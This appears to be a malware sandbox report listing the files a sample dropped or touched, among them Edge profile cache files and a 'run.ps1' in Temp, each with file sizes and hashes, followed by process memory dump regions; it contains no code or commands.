ea49d6e6e83653ea935ab5eb03a26b42ae730e35710f3be3a36edfed07b8f53b89e47da4a121a7dc5d084d649457a53323611bfca8a68809538062595e7b0240

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
89B

MD5
9da1e3bdbe2b10e0fdd437af3dc82982

SHA1
2b01bccd17689260af259e3836b28407db9b4d08

SHA256
03187d1f871b3c615bacd0ae2fe5173a4f6bd121b8d0903901e3869c1320fbfb

SHA512
2739415cc6ae9ca272709d662d0486fd513a8b0a86797828b49dc2578cb5a70a142a73e80f02a9a091cb4fc3d2a59b9771a679fb53528d687e81656e13b67006

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
d144713c9cb89a3c163b4b18341bf100

SHA1
ba0726597fdb7de8f8b37215765723a39703f4c8

SHA256
bde5d3a513f9fc8b6d284f389a99e8e42e573183eed0640043f7529286f99b3a

SHA512
1743c3b3996e874a5478b4084e6c8598789eb831eb727947d614dd7722f0e1df2eb919f28dc5f58e676863f0b1212de843c6ab6b32e8b1a103beb80ba3889d1e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe578491.TMP

Filesize
48B

MD5
715543e59504f9b9b3d9764bddaf9704

SHA1
db829e686c7b0fb0c6a7c96fadbcc0c4f05dd3d8

SHA256
a5865c76a793456733bdd9e43e7f7ab426450b1cc9b9cd785d3ac95836455e42

SHA512
3b5864941a734d6005b010d609df372520de646f84598aea7eb1aed1a6384c30e5dce6664e277fa59395f3f45a7aa92e0700f1f9487c14d3f794d9c904e51213

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
fc23412601781b9d2f38d71d321bc072

SHA1
c8fa54187467200e1e2d98ab4bd882af7ac052a4

SHA256
497acfdf9df810c5ccb934beb8228c3a00b3788ac3fdbd6c899e48da783c1ae9

SHA512
83eeefa5595cc81523f68dc61bd56dfb0b9c4c0c274bf2ebcb88fc776c0e3a9b60d3f52b1411c0e7c6d17c5d8f7f2469defaddc4f05a0b29c7364c926e8e5818

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
1f02895562f5fdd2bf8c53de633818a9

SHA1
93652af60f46ffa818614f0ca79bd995fbf15f95

SHA256
7f5572c3517ee5b7cd3cfc5747b6c342f6e0215919d6b49f55694e4ee5058db6

SHA512
9d409ce6de25b144978110974922827171023c093c5c54839d663bc1619d6ab96635651b283acaaa462221ee300b5817d251313f35eee9198e3fe9a13c2b6aeb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9713d679ec80313b8ec69f997688353b

SHA1
091272644c89045c60600294dc68ca69ceb5363f

SHA256
1442e4fd5204a780c5a253db868b8ca385a51d890579ace84ef031158935a7f2

SHA512
36d80cbc2b804a7a424c25980b7afe30c30e0f76bb4798146f775a6eb88a12f5533b9a72c7279b3423526e99f34a240516abe674149476e1087916d4ecfa6dc1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
9b367c53270b61ce59c2510a224c7a60

SHA1
d46a8bebee55d5868e3d6f87e3ed25374919cf9f

SHA256
ffea339ec5b5dfcd03c40c3d038684c9a5d2cdfbefd5dd6574b41a2ee3548960

SHA512
4eda0a5d2ecae6d0f6605558f1f64557f1cc3acd47c5e167116a4e17c4edfe19bbd407737de0eec441f166090422b2691e6452cafb3cacf10186567c980860ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0025cvdt.j0n.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\run.ps1

Filesize
58KB

MD5
ecee6cc4e0bf90b7f0584a25788af710

SHA1
29ee18dfa7b14336070ce8ba73af3ac12a50b19a

SHA256
990c2addcb8712bf9e3f246d73045f8dc33ebbe42fa8297fa3a504e11d8f067c

SHA512
050690ba9a389a361a29bdc66e1925d8f241bdc96add1180ee2709e9c8962c59f4e4dfd3295b18b71310cd8dd2cfff052c1e2dbe5c1e38bd818121ca6e6f9e9b

Download Submit
memory/1052-0-0x000002B473520000-0x000002B473542000-memory.dmp

Filesize
136KB

Download
memory/1052-11-0x000002B473360000-0x000002B473370000-memory.dmp

Filesize
64KB

Download
memory/1052-383-0x00007FF984110000-0x00007FF984BD1000-memory.dmp

Filesize
10.8MB

Download
memory/1052-10-0x00007FF984110000-0x00007FF984BD1000-memory.dmp

Filesize
10.8MB

Download
memory/1052-436-0x000002B473360000-0x000002B473370000-memory.dmp

Filesize
64KB

Download
memory/1052-437-0x000002B473360000-0x000002B473370000-memory.dmp

Filesize
64KB

Download
memory/1052-12-0x000002B473360000-0x000002B473370000-memory.dmp

Filesize
64KB

Download
memory/1808-653-0x000002F223B50000-0x000002F223B76000-memory.dmp

Filesize
152KB

Download
memory/1808-629-0x000002F206E80000-0x000002F206EB8000-memory.dmp

Filesize
224KB

Download
memory/1808-655-0x00007FF984110000-0x00007FF984BD1000-memory.dmp

Filesize
10.8MB

Download
memory/1808-639-0x000002F222640000-0x000002F222648000-memory.dmp

Filesize
32KB

Download
memory/1808-634-0x000002F222670000-0x000002F2226A8000-memory.dmp

Filesize
224KB

Download
memory/1808-633-0x000002F208D20000-0x000002F208D2E000-memory.dmp

Filesize
56KB

Download
memory/1808-632-0x000002F2237E0000-0x000002F22382A000-memory.dmp

Filesize
296KB

Download
memory/1808-631-0x000002F208B40000-0x000002F208B50000-memory.dmp

Filesize
64KB

Download
memory/1808-630-0x00007FF984110000-0x00007FF984BD1000-memory.dmp

Filesize
10.8MB

Download
memory/1808-650-0x000002F2228D0000-0x000002F2228D8000-memory.dmp

Filesize
32KB

Download
memory/1808-649-0x000002F208B40000-0x000002F208B50000-memory.dmp

Filesize
64KB

Download
memory/1808-656-0x000002F208B40000-0x000002F208B50000-memory.dmp

Filesize
64KB

Download
memory/1808-657-0x000002F208B40000-0x000002F208B50000-memory.dmp

Filesize
64KB

Download
memory/1808-652-0x000002F223960000-0x000002F223968000-memory.dmp

Filesize
32KB

Download
memory/1808-651-0x000002F2228E0000-0x000002F2228E8000-memory.dmp

Filesize
32KB

Download
memory/3144-22-0x00007FF984110000-0x00007FF984BD1000-memory.dmp

Filesize
10.8MB

Download
memory/3144-23-0x000002320E5C0000-0x000002320E5D0000-memory.dmp

Filesize
64KB

Download
memory/3144-24-0x000002320E5C0000-0x000002320E5D0000-memory.dmp

Filesize
64KB

Download
memory/3144-27-0x00007FF984110000-0x00007FF984BD1000-memory.dmp

Filesize
10.8MB

Download
memory/4420-31-0x00000294B2530000-0x00000294B2540000-memory.dmp

Filesize
64KB

Download
memory/4420-30-0x00000294B2530000-0x00000294B2540000-memory.dmp

Filesize
64KB

Download
memory/4420-29-0x00007FF984110000-0x00007FF984BD1000-memory.dmp

Filesize
10.8MB

Download
memory/4420-43-0x00007FF984110000-0x00007FF984BD1000-memory.dmp

Filesize
10.8MB

Download
memory/4512-55-0x00007FF984110000-0x00007FF984BD1000-memory.dmp

Filesize
10.8MB

Download
memory/4512-628-0x000002789F130000-0x000002789F140000-memory.dmp

Filesize
64KB

Download
memory/4512-627-0x000002789F130000-0x000002789F140000-memory.dmp

Filesize
64KB

Download
memory/4512-626-0x000002789F130000-0x000002789F140000-memory.dmp

Filesize
64KB

Download
memory/4512-458-0x00007FF984110000-0x00007FF984BD1000-memory.dmp

Filesize
10.8MB

Download
memory/4512-81-0x000002789F130000-0x000002789F140000-memory.dmp

Filesize
64KB

Download
memory/4512-63-0x000002789F130000-0x000002789F140000-memory.dmp

Filesize
64KB

Download
memory/4512-57-0x000002789F130000-0x000002789F140000-memory.dmp

Filesize
64KB

Download